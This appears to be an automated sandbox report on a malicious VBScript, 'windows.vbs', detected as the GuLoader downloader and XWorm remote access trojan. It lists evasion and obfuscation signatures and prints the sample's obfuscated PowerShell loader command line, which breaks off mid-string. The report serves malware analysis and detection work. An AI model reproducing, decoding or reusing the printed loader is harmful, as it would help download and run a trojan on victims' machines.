Windows
Analysis Report
windows.vbs
Overview
General Information
Detection
GuLoader, XWorm
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 1364 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\windo ws.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) powershell.exe (PID: 7308 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Coddle = 1;$Pararc talia='Su' ;$Pararcta lia+='bstr in';$Parar ctalia+='g ';Function Tilsynsra ads($Parad oxer){$Afp rver=$Para doxer.Leng th-$Coddle ;For($Publ ikummer=5; $Publikumm er -lt $Af prver;$Pub likummer+= 6){$Printe rdefinitio nerne+=$Pa radoxer.$P ararctalia .Invoke( $ Publikumme r, $Coddle );}$Printe rdefinitio nerne;}fun ction Hand elsmssiges ($Overimag inatively) {& ($Nondi ligently10 6) ($Overi maginative ly);}$Toni skes=Tilsy nsraads 'M ana,MWeddi oFell,zUnc omi C.pilN onbelstang a Ripo/Sta kn5Forho.M ythi0 Unde Nonvo( Di spW StaniE arthnU.vet dBrystoOut biwUnives pakk Kirj. N eratTuns t. Revo1Re mit0tamgs. Brde.0 Rus t;Tanch .o nomWAntiri Sansenomdr i6Rip n4Li lje;M als AlloxDoxyc 6Folkl4 ma rg;Oxa,i A mararGasko vRock,:Smi le1Eleus2S .xte1recli . ,ndr0Ge. er)Henst B arbaGoutlu egadsbcKin dlkBumpio .lab/Capit 2Vo.dt0Len da1 She,0 Bus 0 her1 Bes,y0Syng e1Contr R. stiFDukkei F.rberslin geEkspafEn teroImprex D,maj/Urea l1Lever2Po lyp1 Micr. .gat0Buhk o ';$Melli te=Tilsyns raads ' Cr anU Skams Txthe b rk rS.iff-Pre noALe.sigA lkohe Vels nMi.sitVoi ce ';$Over much=Tilsy nsraads 'C urnehGemmi tSievetRor .ypFr.bisE ,xli:Lealn /Cara /T.l dfwTelotw E fawDamno .,orsmsKub epeTrkkrnU ncubdNonlu s verip Sa loaInobtcA fleveSanda .Di.crc Sy llo Wo,emS .ald/Bo.se pFe.rorSex booKlapp/I ntemdPhysi lOu,ro/Dar yltdisorbh e,vifLoads v ,ephparr ,udUfor. ' ;$Oscheoli th=Tilsyns raads 'Sut te> Fluo ' ;$Nondilig ently106=T ilsynsraad s 'SkabeiD etrae.ligt xrub i ';$ Taxaers='t otemites'; Handelsmss iges (Tils ynsraads ' HydroSObte .e SnostSt ipu-Aqua,C foldeoSkul dn ,seut B nd,e,asekn VerdetBlus h Raps-Ste nrP.lotsaJ ern tTopo, hOkays S a vkTCorra: Vara\Koer, FUdbrelKli ppoTota pM andip Tid i OvernGym noeOvervsG o alsStrmf .Unsa,t Il d.xDataot. dsta Rec.n -BlubbV aa geaAbstilN onreuRan.f eSlegf elo n$Mist,Tma raua Autox Rubia elo neMy derUn lansIncha; Forto ');H andelsmssi ges (Tilsy nsraads 'B ehani Gra. fChalc Udf o ( sphotU dsigeKrukk sWennitNy. ed-Paddop Plagavados tIngloh kr ue Ree eTS tati:Hydro \ TobaF Se mil,etstoL ifesp F rm pD.spliFor stnF iakeE s,ivsDk en sTer.i.Def ort TechxC e trtLys.r )In ba{Srg ,se Krusx, noggiMynd, ttilvi}Akt i,; Kame ' );$Strmpeh olderens = Tilsynsra ads 'G jst efornic Un thUnpawo Af r Rockw %Spatiaarg olpAarempB u ked Nd a aSt,klt Sc ruaVictu%V a.id\ Und, Bm,llerEks pei Skama PagnrTelef bStrafeMis unrUnoblrM ohamySprge .SekunM S. rdiEgnsplN kke Justi &Ell c&Lge lf rivieUn st cAdriah Likvo nag e ,ape$Tac tu ';Hande lsmssiges (Tilsynsra ads ' Nedf $NonligKon celArts oD obb b D,om a K ynlBeb yg:Be,tiPR evokr orso TidsivMill ii ,rdis S olaiTheopo Refern Pro